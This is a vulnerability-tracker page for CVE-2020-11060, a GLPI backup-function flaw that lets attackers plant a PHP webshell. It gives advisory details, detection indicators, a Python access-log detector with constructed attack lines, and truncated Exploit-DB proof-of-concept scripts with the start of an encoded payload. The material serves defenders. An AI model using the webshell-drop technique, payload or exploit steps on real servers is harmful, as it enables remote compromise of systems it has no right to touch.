CVE-2020-11060
published 2020-05-12
Priority: P269 · high · 8.8 (CVSS 3.1)
Vector: AV:N / AC:L / PR:L / UI:N / S:U / C:H / I:H / A:H
Exploit: available
EPSS: 10.95% (95.3rd percentile)
In GLPI before 9.4.6, an attacker can execute system commands by abusing the backup functionality. Theoretically, this vulnerability can be exploited by an attacker without a valid account by using a CSRF. Due to the difficulty of the exploitation, the attack is only conceivable by an account having Maintenance privileges and the right to add WIFI networks. This is fixed in version 9.4.6.
Affected
1 range
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| glpi-project | glpi | < 9.4.6 | 9.4.6 |
Detection & IOCs (extracted from sources)
- Detect HTTP GET requests to /front/backup.php with parameters dump=dump and fichier= pointing to a web-accessible path (e.g. /pics/) or a file ending in .php; a legitimate backup also uses dump=dump, so the output path in fichier is what distinguishes the backup-to-webshell technique from normal use.
- Monitor POST requests to /front/wifinetwork.form.php whose 'comment' field is unusually large or binary; this is how the crafted GZIP payload is stored in the database before the dump writes it out.
- Alert on newly created .php files under the GLPI /pics/ directory: the exploit writes its PHP webshell there through the backup dump functionality.
- The exploit harvests CSRF tokens with the pattern name="_glpi_csrf_token" value="([a-f0-9]{32})"; monitor for automated, rapid sequential requests to the login and wifinetwork pages.
- The original PoC fetches the GZIP payload at run time from a GitHub raw URL (AlmondOffSec/PoCs), so an outbound connection to that URL during an attack session is a strong indicator. It is the attacker's host that makes this connection, not the GLPI server, and the Python 3 rewrite below embeds the payload inline, so its absence proves nothing.
- The offsettable parameter (312 in the PoC) must match the position of the wifinetworks table among the CREATE TABLE statements of the SQL dump (the number reported by grep "CREATE TABLE" | grep -n wifinetworks); it varies per GLPI installation and database state, so an attacker must enumerate it first.
- The web-writable output path for the dropped shell differs by platform: C:\xampp\htdocs\pics\ on Windows and /var/www/html/glpi/pics/ on Linux; non-default installations require path adjustment.
- Exploitation requires an authenticated account with both Maintenance privileges and the right to add WiFi networks, or a CSRF attack against such an account.
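As an added example (it is not code from this page, from the PoC authors or from the GLPI project), the script below applies the request-level indicators above to web-server access log lines: a GET to /front/backup.php with dump=dump and a fichier value that ends in .php or points under pics/ (both the Linux and the URL-encoded Windows form), a POST to /front/wifinetwork.form.php from the same source shortly before such a dump, and a later request to a .php file under pics/. The log lines are constructed for illustration; the /glpi/ URL prefix, the Apache combined log format, the five-minute correlation window, the file names and the addresses are all assumptions.

```python
import re
from datetime import datetime
from urllib.parse import parse_qs, urlsplit

# Apache "combined" log format (assumed); referrer and user-agent are not needed here.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

# Constructed sample traffic (not a real capture). Lines 1-3 mimic the PoC sequence
# from one address: store the payload via the WiFi network form, dump it through
# backup.php into a .php file under pics/, then call the dropped shell. Lines 4-5 are
# a legitimate backup (written under files/_dumps/) and an ordinary WiFi network edit.
# Line 6 is the Windows variant of the dump request, with no preceding POST.
SAMPLE_LOG = """\
10.0.0.5 - - [12/May/2020:10:00:01 +0000] "POST /glpi/front/wifinetwork.form.php HTTP/1.1" 302 4210 "-" "python-requests/2.25.1"
10.0.0.5 - - [12/May/2020:10:00:02 +0000] "GET /glpi/front/backup.php?dump=dump&fichier=/var/www/html/glpi/pics/s3cr3t.php&offsettable=312 HTTP/1.1" 200 512 "-" "python-requests/2.25.1"
10.0.0.5 - - [12/May/2020:10:00:03 +0000] "GET /glpi/pics/s3cr3t.php?cmd=id HTTP/1.1" 200 87 "-" "python-requests/2.25.1"
10.0.0.9 - - [12/May/2020:11:30:00 +0000] "GET /glpi/front/backup.php?dump=dump&fichier=/var/www/html/glpi/files/_dumps/glpi-9.4.5-2020-05-12.sql.gz&offsettable=0 HTTP/1.1" 200 512 "https://glpi.example/glpi/front/backup.php" "Mozilla/5.0"
10.0.0.9 - - [12/May/2020:11:30:05 +0000] "POST /glpi/front/wifinetwork.form.php HTTP/1.1" 302 0 "https://glpi.example/glpi/front/wifinetwork.form.php" "Mozilla/5.0"
10.0.0.7 - - [12/May/2020:12:00:00 +0000] "GET /glpi/front/backup.php?dump=dump&fichier=C%3A%5Cxampp%5Chtdocs%5Cpics%5Cshell.php&offsettable=312 HTTP/1.1" 200 512 "-" "curl/7.74.0"
"""


def parse_line(line):
    """Parse one combined-format log line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ev = m.groupdict()
    ev["ts"] = datetime.strptime(ev["ts"], "%d/%b/%Y:%H:%M:%S %z")
    parts = urlsplit(ev["target"])
    ev["path"] = parts.path.lower()
    ev["query"] = parse_qs(parts.query)  # percent-decodes the fichier value
    return ev


def is_backup_to_webshell(ev):
    """GET /front/backup.php?dump=dump&fichier=<web-reachable .php path>."""
    if ev["method"] != "GET" or not ev["path"].endswith("/front/backup.php"):
        return False
    if ev["query"].get("dump", [""])[0] != "dump":
        return False
    # Normalise Windows separators so C:\xampp\htdocs\pics\x.php is caught too.
    fichier = ev["query"].get("fichier", [""])[0].replace("\\", "/").lower()
    return fichier.endswith(".php") or "/pics/" in fichier


def is_wifinetwork_post(ev):
    return ev["method"] == "POST" and ev["path"].endswith("/front/wifinetwork.form.php")


def is_webshell_request(ev):
    return "/pics/" in ev["path"] and ev["path"].endswith(".php")


def analyze(log_text, window_seconds=300):
    """Return (kind, source_ip, request_target) findings, in log order."""
    findings = []
    last_post = {}  # source ip -> time of its most recent wifinetwork POST
    for line in log_text.splitlines():
        ev = parse_line(line)
        if ev is None:
            continue
        if is_wifinetwork_post(ev):
            last_post[ev["ip"]] = ev["ts"]
        elif is_backup_to_webshell(ev):
            findings.append(("backup_to_webshell", ev["ip"], ev["target"]))
            seen = last_post.get(ev["ip"])
            if seen is not None and 0 <= (ev["ts"] - seen).total_seconds() <= window_seconds:
                findings.append(("wifinetwork_then_dump", ev["ip"], ev["target"]))
        elif is_webshell_request(ev):
            findings.append(("webshell_request", ev["ip"], ev["target"]))
    return findings


if __name__ == "__main__":
    for kind, ip, target in analyze(SAMPLE_LOG):
        print(f"{kind:22} {ip:10} {target}")
```

The endpoint alone is a poor signal because a real backup also calls backup.php?dump=dump; the fichier destination and the POST-then-dump sequence from one address are what separate abuse from administration. Behind a reverse proxy that rewrites paths, or with an install prefix other than /glpi/, the suffix checks on path need adjusting.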
CVSS provenance
| Source | Version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | 3.1 | 8.8 | HIGH | CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H |
| nvd | 2.0 | 9.0 | HIGH | AV:N/AC:L/Au:S/C:C/I:C/A:C |
| osv | - | 8.8 | HIGH | - |
No detection rules found.
Exploit-DB
GLPI GZIP(Py3) 9.4.5 - RCE
exploitdb·2023-10-09
---
```python
#!/usr/bin/env python3
# Exploit Title: GLPI GZIP(Py3) 9.4.5 - RCE
# Date: 08-30-2021
# Exploit Authors: Brian Peters & n3rada
# Vendor Homepage: https://glpi-project.org/
# Software Link: https://github.com/glpi-project/glpi/releases
# Version: 0.8.5-9.4.5
# Tested on: Exploit ran on Kali 2021. GLPI Ran on Windows 2019
# CVE: 2020-11060

# Built-in imports
import argparse
import random
import re
import string
from datetime import datetime

# Third party library imports
import requests
from lxml import html

# https://raw.githubusercontent.com/AlmondOffSec/PoCs/master/glpi_rce_gzip/poc.txt
PAYLOAD = ";)qRJ*_O88Ux-0cRlA`B]5y[r.no5bKUb2EzEW34O(K~.Oa}pO}1F956/fp@mz`oQqahP+@[/tiLy:]YBmFrRmc*Jt}VxM^@(9BeSTo|zQ}6d/zF|LOMqSy:Nk5hCLU.s-Tx;fHci?1],*9}r;,FmIDZ5^|0SNYjN}H7z{
```
Exploit-DB
GLPI 9.4.5 - Remote Code Execution (RCE)
exploitdb·2021-06-14·CVSS 7.4
---
```python
#!/usr/bin/python
# Exploit Title: GLPI 9.4.5 - Remote Code Execution (RCE)
# Exploit Author: Brian Peters
# Vendor Homepage: https://glpi-project.org
# Software Link: https://github.com/glpi-project/glpi/releases
# Version:
# Find the position of the wifinetworks table in a SQL dump of the GLPI database:
#   ... | grep "CREATE TABLE" | grep -n wifinetworks
# Update the offsettable value with this number in the create_dump function
# The Nix/Win paths are based on defaults. You can use curl -I and use md5sum to find the path based
# on the Set-Cookie hash.
import argparse
import json
import random
import re
import string
import sys
import time
from datetime import datetime

import requests
from lxml import html


class GlpiBrowser:
    def __init__(self, url, user, password, platform):
        self.url = url
        self.user = user
        self.password = password
        self.platform = platform
```
Bugzilla
CVE-2020-11060 glpi: remote code execution via the backup functionality [epel-7]
bugzilla·2020-05-20·CVSS 7.4
This is an automatically created tracking bug! It was created to ensure
that one or more security vulnerabilities are fixed in affected versions
of epel-7.
For comments that are specific to the vulnerability please use bugs filed
against the "Security Response" product referenced in the "Blocks" field.
For more information see:
http://fedoraproject.org/wiki/Security/TrackingBugs
When submitting as an update, use the fedpkg template provided in the next
comment(s). This will include the bug IDs of this tracking bug as well as
the relevant top-level CVE bugs.
Please also mention the CVE IDs being fixed in the RPM changelog and the
fedpkg commit message.
Discussion:
Use the following template for the 'f
Bugzilla
CVE-2020-11060 glpi: remote code execution via the backup functionality
bugzilla·2020-05-20·CVSS 7.4
In GLPI before 9.4.6, an attacker can execute system commands by abusing the backup functionality. Theoretically, this vulnerability can be exploited by an attacker without a valid account by using a CSRF. Due to the difficulty of the exploitation, the attack is only conceivable by an account having Maintenance privileges and the right to add WIFI networks. This is fixed in version 9.4.6.
Reference:
https://github.com/glpi-project/glpi/security/advisories/GHSA-cvvq-3fww-5v6f
Upstream commit:
https://github.com/glpi-project/glpi/commit/ad748d59c94da177a3ed25111c453902396f320c
Discussion:
Created glpi tracking bugs for this issue:
Affects: epel-7 [bug 1838308]
References:
- http://packetstormsecurity.com/files/163119/GLPI-9.4.5-Remote-Code-Execution.html
- https://github.com/glpi-project/glpi/commit/ad748d59c94da177a3ed25111c453902396f320c
- https://github.com/glpi-project/glpi/security/advisories/GHSA-cvvq-3fww-5v6f